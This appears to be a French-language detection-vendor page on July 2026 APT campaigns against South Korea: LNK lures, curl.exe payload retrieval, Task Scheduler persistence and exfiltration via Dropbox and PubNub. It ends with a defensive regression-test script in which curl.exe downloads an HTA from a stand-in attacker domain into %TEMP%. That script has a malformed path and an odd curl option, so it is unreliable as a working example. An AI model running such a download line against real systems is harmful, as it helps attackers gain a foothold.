Rapport sur les Menaces APT en Corée du Sud : Tendances de Juillet 2026
Detection stack
- AIDR
- Alert
- ETL
- Query
Résumé
AhnLab signale une augmentation de l’activité APT ciblant les organisations sud-coréennes via des campagnes de spear-phishing. Les attaques reposent principalement sur des fichiers LNK malveillants pour livrer des charges utiles, y compris des scripts PowerShell, des scripts AutoIt et des portes dérobées. Les techniques courantes incluent la persistance via le Planificateur de tâches et l’exfiltration de données via des services tels que Dropbox et PubNub.
Enquête
L’enquête s’est concentrée sur l’infrastructure APT utilisée contre les entités sud-coréennes tout au long de juillet 2026. Les analystes ont regroupé l’activité en plusieurs types d’attaques, de A à G, en fonction des méthodes de livraison et des caractéristiques fonctionnelles. Les chercheurs ont également identifié des comportements incluant le DLL side-loading et l’abus des utilitaires natifs de Windows tels que curl.exe pour la récupération de la charge utile.
Atténuation
Les utilisateurs doivent vérifier l’identité de l’expéditeur et éviter d’ouvrir les pièces jointes reçues de sources inconnues ou non fiables. Les organisations doivent maintenir les systèmes d’exploitation et les navigateurs web à jour avec les derniers correctifs de sécurité. Il est également recommandé de maintenir les solutions antivirus et de protection des points de terminaison actuelles telles que V3.
Réponse
Si des fichiers LNK suspects ou des entrées non autorisées du Planificateur de tâches sont détectés, les intervenants en cas d’incident doivent isoler immédiatement l’hôte affecté. Des analyses forensiques de la mémoire doivent être effectuées pour identifier des portes dérobées injectées ou des DLL malveillantes. Les journaux réseau doivent également être examinés pour détecter des connexions sortantes inhabituelles vers des services d’hébergement de fichiers ou des canaux de commande et de contrôle tels que PubNub.
Flux d’attaque
Nous sommes encore en train de mettre à jour cette partie.
Détections
Comportement suspect d’évasion de défense MSHTA LOLBAS par détection de commandes associées (via process_creation)
Utilisation suspecte de CURL (via cmdline)
Tâche planifiée suspecte (via audit)
Infiltration / exfiltration de données possible / C2 via des services / outils tiers (via proxy)
Infiltration / exfiltration de données possible / C2 via des services / outils tiers (via dns)
IOC (HashMd5) à détecter : Rapport de tendance des menaces de juillet 2026 sur les attaques APT (Corée du Sud)
Curl.Exe utilisé pour télécharger et exécuter des fichiers malveillants [Windows Sysmon]
Détecter les commandes PowerShell malveillantes dans les fichiers LNK [Windows Powershell]
Exécution de la simulation
Prérequis : La vérification préalable de la télémétrie et de la base de référence doit être réussie.
Justification : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT directement refléter les TTPs identifiés et viser à générer la télémétrie exacte attendue par la logique de détection. Des exemples abstraits ou non liés conduiront à un mauvais diagnostic.
-
Récit d’attaque et commandes : L’adversaire a l’intention d’utiliser
curl.exepour télécharger un fichier HTA malveillant dans le%TEMP%répertoire pour établir un point d’ancrage. Pour tester si la logique de détection actuelle fonctionne (car elle recherche spécifiquement les mots « download » ou « execute »), l’attaquant utilisera une ligne de commande qui inclut explicitement ces mots dans le cadre d’un faux argument ou d’une description, simulant un script mal construit ou une tentative spécifique de mimer le modèle recherché par le SOC. -
Script de test de régression :
# Simulez un adversaire utilisant curl avec les mots-clés spécifiques requis par la règle $tempPath = $env:TEMPmalicious.hta $url = "http://attacker-controlled-domain.com/payload.hta" # Cette commande est spécialement conçue pour déclencher la logique de 'contient' de la règle # en incluant les mots 'download' et 'execute' dans la chaîne de ligne de commande. Start-Process "curl.exe" -ArgumentList "-L $url -o $tempPath --comment 'download and execute this file'" -
Commandes de nettoyage :
# Supprimez le fichier fictif créé pendant la simulation if (Test-Path "$env:TEMPmalicious.hta") { Remove-Item -Path "$env:TEMPmalicious.hta" -Force }